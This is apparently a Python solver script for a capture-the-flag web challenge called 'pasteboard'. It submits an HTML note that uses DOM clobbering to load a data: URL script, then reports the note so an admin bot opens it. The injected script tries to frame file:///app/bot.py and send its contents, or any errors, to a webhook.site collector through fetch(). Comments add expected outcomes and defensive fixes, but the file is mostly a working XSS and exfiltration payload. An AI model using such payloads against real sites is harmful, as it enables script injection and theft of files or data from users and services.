import requests

# Base URL of the challenge instance that receives the note and the report.
BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
# Collector endpoint for the callbacks made by the payload.
# NOTE(review): this constant is never referenced in the visible script; the
# payload and the final hint print hard-code the same URL, so every copy has to
# be kept in sync by hand.
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Note body, submitted as raw HTML.
#
# Structure:
#   * <form id="errorReporter"> with an <input name="path"> whose value is a
#     data:text/javascript URL, and an <img id="renderConfig"> whose inline
#     onerror sets window.lastRenderError and throws.
#     Presumably the note page's own script looks up `errorReporter` /
#     `renderConfig` as named DOM globals and loads `path` as a script (DOM
#     clobbering); that page code is not visible here, so confirm against the
#     challenge source.
#   * The script in the data: URL does not use file:// as a script src. It
#     creates an <iframe> pointing at file:///app/bot.py and, on load, tries to
#     read the frame's body text and send it to the /FILE path of the collector.
#     An exception in that read is reported to /ERR1, an iframe error event to
#     /ERR2.
#
# Expected outcome (to be confirmed in the target browser): a page served over
# https is normally not allowed to load a file:// URL in a frame, and reading
# contentWindow.document of a cross-origin frame raises a SecurityError, so an
# /ERR1 callback or no /FILE callback is the likely result.
#
# Defensive takeaway for the application side: sanitise note bodies so that
# id/name attributes cannot shadow names the page script relies on, avoid
# reading configuration from named DOM globals, and use a CSP whose script-src
# does not allow data: URLs.
payload = '''<form id="errorReporter"><input name="path" value="data:text/javascript,
var iframe = document.createElement('iframe');
iframe.src = 'file:///app/bot.py';
iframe.onload = function() {
  try {
    var content = iframe.contentWindow.document.body.innerText;
    fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/FILE?c='+encodeURIComponent(content));
  } catch(e) {
    fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/ERR1?e='+e);
  }
};
iframe.onerror = function(e) {
  fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/ERR2?e='+e);
};
document.body.appendChild(iframe);
"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

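# Create the note, then submit its path to the /report endpoint.
# requests applies no timeout by default, so an unresponsive host would hang
# the script indefinitely; every call below is bounded by this value (seconds).
REQUEST_TIMEOUT = 10

print("[*] Trying iframe to load file:///app/bot.py...")
print()

# The context manager closes the session's pooled connections on exit.
with requests.Session() as session:
    # Redirects are not followed so the path of the new note can be read from
    # the Location header of the 302 response.
    resp = session.post(
        f"{BASE_URL}/note/new",
        data={"title": "Iframe", "body": payload},
        allow_redirects=False,
        timeout=REQUEST_TIMEOUT,
    )

    location = resp.headers.get("Location")
    if resp.status_code != 302 or not location:
        # Without this branch the script exits silently, or builds a URL that
        # ends in "None" when the header is missing.
        print(
            f"[-] Note creation failed: HTTP {resp.status_code}, "
            f"Location={location!r}"
        )
    else:
        note_url = f"{BASE_URL}{location}"
        print(f"[+] Created: {note_url}")

        # The report endpoint is given the path from the Location header, not
        # the absolute URL.
        report = session.post(
            f"{BASE_URL}/report",
            data={"url": location},
            timeout=REQUEST_TIMEOUT,
        )
        if report.status_code == 202:
            print("[+] Reported!")
            print()
            print("[*] Check webhook for /FILE or /ERR requests")
            print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
        else:
            # Report any status other than 202 instead of ending silently.
            print(f"[-] Report was not accepted: HTTP {report.status_code}")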
